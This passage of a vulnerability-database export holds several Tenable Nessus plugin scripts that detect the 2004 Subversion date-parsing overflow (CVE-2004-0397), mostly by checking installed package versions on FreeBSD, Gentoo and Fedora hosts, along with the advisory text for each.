BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12618);\n script_version(\"$Revision: 1.11 $\");\n script_cve_id(\"CVE-2004-0397\");\n\n script_name(english:\"FreeBSD : subversion date parsing vulnerability (187)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: subversion');\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://secunia.com/advisories/30994\nhttp://secunia.com/advisories/9096\nhttp://security.e-matters.de/advisories/082004.html\nhttp://www.freedesktop.org/wiki/Software/dbus\nhttp://www.frsirt.com/english/advisories/2006/0554\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-60.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-61.html\nhttp://www.securiteam.com/unixfocus/5CP0N0UAAA.html\nhttp://www.ssh.com/company/newsroom/article/715/\nhttp://x82.inetcop.org/h0me/adv1sor1es/INCSA.2003-0x82-018-GNATS-bt.txt');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_cvs_date(\"$Date: 2011/10/03 00:48:25 $\");\n script_end_attributes();\n script_summary(english:\"Check for subversion\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. 
Refer to plugin #36673 (freebsd_pkg_5d36ef32a9cf11d89c6d0020ed76ef5a.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=7;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"subversion<1.0.2_1\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-01T05:50:03", "description": "The remote host is vulnerable to a remote stack-based\noverflow. An attacker, exploiting this hole, would be\ngiven full access to the target machine. Versions of\nSubversion less than 1.0.3 are vulnerable to this attack.\nThis vulnerability was discovered by Stefan Esser and posted\nto public mailing lists.", "edition": 25, "published": "2004-06-08T00:00:00", "title": "Subversion < 1.0.3 apr_time_t data Conversion Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "SUBVERSION_1_0_4.NASL", "href": "https://www.tenable.com/plugins/nessus/12261", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude( 'compat.inc' );\n\nif(description)\n{\n script_id(12261);\n script_version (\"1.19\");\n script_cve_id(\"CVE-2004-0397\");\n script_bugtraq_id(10386);\n\n script_name(english:\"Subversion < 1.0.3 apr_time_t data Conversion Remote Overflow\");\n script_summary(english:\"Subversion remote Buffer Overflow\");\n\n script_set_attribute(\n attribute:'synopsis',\n value:'The remote service is vulnerable to a buffer overflow.'\n );\n\n script_set_attribute(\n attribute:'description',\n value:'The remote host is vulnerable to a remote stack-based\noverflow. An attacker, exploiting this hole, would be\ngiven full access to the target machine. 
Versions of\nSubversion less than 1.0.3 are vulnerable to this attack.\nThis vulnerability was discovered by Stefan Esser and posted\nto public mailing lists.'\n );\n\n script_set_attribute(\n attribute:'solution',\n value:'Upgrade to version 1.0.3 or higher'\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(\n attribute:'see_also',\n value:'https://seclists.org/bugtraq/2004/May/216'\n );\n\n script_set_attribute(\n attribute:'see_also',\n value:'http://subversion.tigris.org/svn-sscanf-advisory.txt'\n );\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/06/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/05/19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Misc.\");\n script_dependencie(\"subversion_detection.nasl\");\n script_require_ports(\"Services/subversion\");\n exit(0);\n}\n\n\n\n# start check\n# mostly horked from MetaSploit Framework subversion overflow check\n\nport = get_kb_item(\"Services/subversion\");\nif ( ! port ) port = 3690;\n\nif (! 
get_tcp_port_state(port))\n\texit(0);\n\ndat = string(\"( 2 ( edit-pipeline ) 24:svn://host/svn/nessusr0x ) \");\n\nsoc = open_sock_tcp(port);\nif (!soc)\n exit(0);\n\nr = recv_line(socket:soc, length:1024);\n\nif (! r)\n\texit(0);\n\nsend(socket:soc, data:dat);\nr = recv_line(socket:soc, length:256);\n\nif (! r)\n\texit(0);\n\n#display(r);\n\nif (egrep(string:r, pattern:\".*subversion-1\\.0\\.[0-2][^0-9].*\"))\n{\n\tsecurity_hole(port);\n}\n\nclose(soc);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:44:24", "description": "Stefan Esser reports :\n\nSubversion versions up to 1.0.2 are vulnerable to a date parsing\nvulnerability which can be abused to allow remote code execution on\nSubversion servers and therefore could lead to a repository\ncompromise.\n\nNOTE: This vulnerability is similar to the date parsing issue that\naffected neon. However, it is a different and distinct bug.", "edition": 24, "published": "2009-04-23T00:00:00", "title": "FreeBSD : subversion date parsing vulnerability (5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:subversion"], "id": "FREEBSD_PKG_5D36EF32A9CF11D89C6D0020ED76EF5A.NASL", "href": "https://www.tenable.com/plugins/nessus/36673", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36673);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0397\");\n\n script_name(english:\"FreeBSD : subversion date parsing vulnerability (5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser reports :\n\nSubversion 
versions up to 1.0.2 are vulnerable to a date parsing\nvulnerability which can be abused to allow remote code execution on\nSubversion servers and therefore could lead to a repository\ncompromise.\n\nNOTE: This vulnerability is similar to the date parsing issue that\naffected neon. However, it is a different and distinct bug.\"\n );\n # http://security.e-matters.de/advisories/082004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a28c1fb\"\n );\n # https://vuxml.freebsd.org/freebsd/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c36501c0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"subversion<1.0.2_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:49", "description": "The remote host is affected by the vulnerability described in GLSA-200405-14\n(Buffer overflow in Subversion)\n\n All releases of Subversion prior to 1.0.3 have a vulnerability in the\n date-parsing code. This vulnerability may allow denial of service or\n arbitrary code execution as the Subversion user. Both the client and\n server are vulnerable, and write access is NOT required to the server's\n repository.\n \nImpact :\n\n All servers and clients are vulnerable. Specifically, clients that\n allow other users to write to administrative files in a working copy\n may be exploited. Additionally all servers (whether they are httpd/DAV\n or svnserve) are vulnerable. Write access to the server is not\n required; public read-only Subversion servers are also exploitable.\n \nWorkaround :\n\n There is no known workaround at this time. 
All users are encouraged to\n upgrade to the latest available version.", "edition": 26, "published": "2004-08-30T00:00:00", "title": "GLSA-200405-14 : Buffer overflow in Subversion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2004-08-30T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:subversion"], "id": "GENTOO_GLSA-200405-14.NASL", "href": "https://www.tenable.com/plugins/nessus/14500", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200405-14.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14500);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0397\");\n script_xref(name:\"GLSA\", value:\"200405-14\");\n\n script_name(english:\"GLSA-200405-14 : Buffer overflow in Subversion\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200405-14\n(Buffer overflow in Subversion)\n\n All releases of Subversion prior to 1.0.3 have a vulnerability in the\n date-parsing code. This vulnerability may allow denial of service or\n arbitrary code execution as the Subversion user. 
Both the client and\n server are vulnerable, and write access is NOT required to the server's\n repository.\n \nImpact :\n\n All servers and clients are vulnerable. Specifically, clients that\n allow other users to write to administrative files in a working copy\n may be exploited. Additionally all servers (whether they are httpd/DAV\n or svnserve) are vulnerable. Write access to the server is not\n required; public read-only Subversion servers are also exploitable.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version.\"\n );\n # http://subversion.tigris.org/servlets/ReadMsg?list=announce&msgNo=125\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1853132a\"\n );\n # http://security.e-matters.de/advisories/082004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a28c1fb\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200405-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Subversion users should upgrade to the latest stable version:\n # emerge sync\n # emerge -pv '>=dev-util/subversion-1.0.3'\n # emerge '>=dev-util/subversion-1.0.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:gentoo:linux:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-util/subversion\", unaffected:make_list(\"ge 1.0.3\"), vulnerable:make_list(\"le 1.0.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dev-util/subversion\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:41", "description": "Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. 
\n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-07-23T00:00:00", "title": "Fedora Core 1 : subversion-0.32.1-2 (2004-127)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2004-07-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:subversion-debuginfo", "p-cpe:/a:fedoraproject:fedora:subversion-devel", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:mod_dav_svn", "p-cpe:/a:fedoraproject:fedora:subversion"], "id": "FEDORA_2004-127.NASL", "href": "https://www.tenable.com/plugins/nessus/13702", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-127.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13702);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0397\");\n script_xref(name:\"FEDORA\", value:\"2004-127\");\n\n script_name(english:\"Fedora Core 1 : subversion-0.32.1-2 (2004-127)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. 
An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-May/000131.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?618b8f54\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_dav_svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"mod_dav_svn-0.32.1-2\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"subversion-0.32.1-2\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"subversion-debuginfo-0.32.1-2\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"subversion-devel-0.32.1-2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_dav_svn / subversion / subversion-debuginfo / subversion-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:41", "description": "Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-07-23T00:00:00", "title": "Fedora Core 2 : subversion-1.0.2-2.1 (2004-128)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2004-07-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:2", "p-cpe:/a:fedoraproject:fedora:subversion-debuginfo", "p-cpe:/a:fedoraproject:fedora:subversion-devel", "p-cpe:/a:fedoraproject:fedora:mod_dav_svn", "p-cpe:/a:fedoraproject:fedora:subversion", "p-cpe:/a:fedoraproject:fedora:subversion-perl"], "id": "FEDORA_2004-128.NASL", "href": "https://www.tenable.com/plugins/nessus/13703", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-128.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13703);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0397\");\n script_xref(name:\"FEDORA\", value:\"2004-128\");\n\n script_name(english:\"Fedora Core 2 : subversion-1.0.2-2.1 (2004-128)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. 
This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-May/000132.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?887ce9e5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_dav_svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/23\");\n script_end_attributes();\n\n 
